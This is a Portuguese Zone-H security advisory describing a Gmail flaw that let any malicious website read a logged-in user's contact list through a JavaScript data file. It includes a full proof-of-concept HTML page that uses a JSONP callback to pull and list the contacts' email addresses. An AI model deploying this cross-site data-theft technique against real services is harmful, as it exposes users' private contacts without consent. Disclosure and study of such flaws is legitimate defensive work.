Zone-H
Home arrow Avisos de Segurança arrow Lista de contatos do GMail vulnerável
03 de setembro de 2010
  
 
Ataques desta semana
O.S.  Defs.  %
Linux  9976  73.09%
Win 2003  3249  23.81%
FreeBSD  227  1.66%
Win 2000  66  0.48%
Unknown  48  0.35%
Other  82  0.60%

Total de ataques: 13648 dos quais 2757 único(s) no ip e 10891 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Lista de contatos do GMail vulnerável Imprimir E-mail
Avaliação do Usuário: / 7
PiorMelhor 
Por Andre   
02 de janeiro de 2007
Simplesmente estando logado no GMail e visitando um Web site com um código malicioso, sua lista do contato pode ser roubada assim como todos seus detalhes. O problema ocorre porque o Google armazena os dados da lista de contatos em um arquivo Javascript.  O ataque foi testado nos browsers Firefox, Opera, IE6 e IE 7.

/---code---- 

<html>
<head>
<script>
function google(a) {
document.write("<ol>");
for (i = 0; i < a.Body.Contacts.length; i++) {
document.write("<li>" + a.Body.Contacts[i].Email + "</li>");
}
document.write("</ol>");
}
</script>
<script xsrc="http://docs.google.com/data/contacts?out=js&s how=ALL&psort=Affinity&callback=google&max=99999"> </script></head>
<body>
Hello
</body>
</html>

 ---/

Fonte: slashdot.org 

 
< Anterior   Próximo >
[Voltar]
 
Top!
(C) 2010 Zone-H - Unrestricted Information
Top!